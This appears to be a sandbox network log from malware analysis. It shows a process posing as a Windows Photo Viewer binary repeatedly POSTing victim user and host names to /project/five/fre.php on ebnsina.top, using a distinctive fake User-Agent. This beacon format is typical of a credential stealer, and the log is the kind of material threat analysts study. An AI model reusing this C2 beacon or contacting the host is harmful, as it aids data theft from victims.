Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49763	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:43.987495899 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:44.114038944 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:44.554058075 CEST	631	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=myNapF%2BG6gk5sCVF0GUG9VCQkJEyFKxbxk7tjf5PWcV1xBq6CB%2FRz4UQeI30ceFMv4wUwjOfHTh6R8%2BU%2F9%2F3O3ySByspckBCqlnObcYVKlYSZf%2BtiNT%2Fx6TJ7Lcs9Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d764dd067c8-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49764	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:45.205065012 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:45.329044104 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:45.763633013 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4KDlNyPc2CaORwHbpchk3uwJqO4hVYmiEnPLIwxZrqTzFZPxbIdKyTGU8lwp64rYy89UsZOLsk1QDmmuSrRPKHs7oBomyzMBhm%2B09UYUdZ1hWaUJ3JqQa0vpIOYTGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d7de96c288e-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49765	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:46.959263086 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:47.083638906 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:47.518312931 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EL%2FOSwrGn25cX%2BNQQ5wBn1xT71Q%2BVd4gmXszFbk98R1rgt9x4f1iDw0y4wM2zdtt7xwcszZAV20OlQbHa1obB3iyiu7aEXYHsnUM7WMEzdisCDmDy0hUqEl0nxpsIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d88e9863dcd-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49766	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:47.778228998 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:47.902832031 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:48.190229893 CEST	631	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LbIjAiR5Qn5%2FXF5tIzNUl16QnZlQpQM%2FqMmZmLCAvw%2FAHwr8BVVOeLTli3yNaNhk8xDUvQVKSfRM%2BMREXhFu24%2FrrapJ%2FqfzD2ILBJw0e7QuIGWeyHpXKlA%2B5KDQAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d8e0972db29-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49767	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:48.477935076 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:48.603128910 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:48.892909050 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ukVZsAlCh5fPWAfM0aFjelhtLd3rDmUYZ7MeDwdlJV32rEcnM%2BD9Izkg8SVZ5%2B9NWkVVQcNW5OrejpbB%2BPc9XMJ3%2BStKZttwmlXCp8VAhmJYPEAtbVzGmEXhzMJEg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d926bff3358-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49768	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:49.163901091 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:49.288872957 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:49.587447882 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=22OZ%2BUXMhpltCnFhTK5UcNdZtIlUAB3WiI0v2Q4x9XDp1w9iGwqIaST9Tct%2BHYe1xuCpQ1wlpXk908ZF0W7iPAXF%2Fa5daaJvtS4Q6PbadYaBfzlpcsAvA2p84SX7Qg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d96ad842263-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49769	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:49.855566025 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:49.980385065 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:50.284646034 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=77iKMIayhOHMWqQRpew2BmCGybAM4sgh2G0rFPdlZJuH2BFIIiqsWOBxjHL2Ivc7E835y2pEbcFQg6dE3grIH4GgEAF9Scsk4yjiwZB4jbuKup5yM23b9sLc4sdM%2BA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d9afc46336d-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49770	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:50.546988010 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:50.672096014 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:50.965027094 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HidNInYP7LlLawXZnNWlXidOZtBrgDHaWuUR7WbwaNpsfEygiCZzMaw5916DGmXcqgrq0ZgdKIAhklYQjTF6GPklpfJzX%2B0BzhAEFY9MjnqHMGQ7WGTUcvSeXzx1Xw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d9f48de6dbc-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49772	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:51.243601084 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:51.367784023 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:51.667047977 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B7AbRchydrA%2FtzyqARLuOpr6OyvgMjrf8hT7gFHd88euizlb8cCyj%2BLWVnGh91GwPEVCfBoADQgs%2FYFG9jIhha3KrTtj1b9PY3QUwJ5OfTXbKqTjwfga9Ar7BCruDg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65da3a93f31d7-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49773	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:51.947016954 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:52.071666956 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:52.502201080 CEST	627	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zi%2Fyiwjc6gaFykC8NkfRWgM6x7YE%2FUhdMfvLuBAD3sTYjmBdSDGNEUS45t3SUMbpp0hpaFRVuSmggYVWf8EIztigQMK5%2B9GCseXDETqUDBF4OPk%2B8fW%2B8X3eoE8DrQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65da808d325a0-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49774	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:52.772037029 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:52.897661924 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:53.322824955 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iv4nhdljhnqqgFa0G6LAEwnfiFIY9N%2BvxtSrp2zyXGFDMuN541gT9IDbOSvISHLqas5dzvNnkYzgTo1a8l334AsZZZFdbk0M7l9IScRSVsF8lhJ%2Fndq5l1A0jpvhXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65dad3ae0744a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49775	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:53.598973036 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:53.723952055 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:54.150489092 CEST	629	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJMr3fFxWLJ0H7RfoBoN%2BofmWQ4k0zYcL20rmW5m0ZgDV1mzUGKNCCIuDAW17OGc8C%2Fp6f%2FzE%2FlivnoZrmJaaUX8NfxnyoqNiuJUymfIvOvWF%2FHFN%2FsQlEeXLg0BRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65db26bea67d5-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49776	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:54.423487902 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:54.548974037 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:54.846003056 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SAmbCPZ12wN0WrwbnkTDwGrltIDpFIDvcf1XCHAgOth5S6DxyGBvIoFb87IVmGWao6ovoHQl7wagrp7m%2F1eUGjkPpmhN%2FJrh%2FWA3Asth3Cy%2B6U1nk8AxX9CH8CIrMA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65db78982b3e3-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49777	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:55.108964920 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:55.234338045 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:55.527488947 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KEaEtzjoBdQca1YGMAH6a3J6LiVIM5uaBC0HWjOcg7OwqghMQYmyAhpW2xtmzNgEQ4vmyk4iuNNVzgUVRzuu4r3F1uUwPjrP8bLSUOd3zpnUqxRj0XD6mI%2BE8hQGw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65dbbdac567b6-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49778	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:55.796602011 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:55.921500921 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
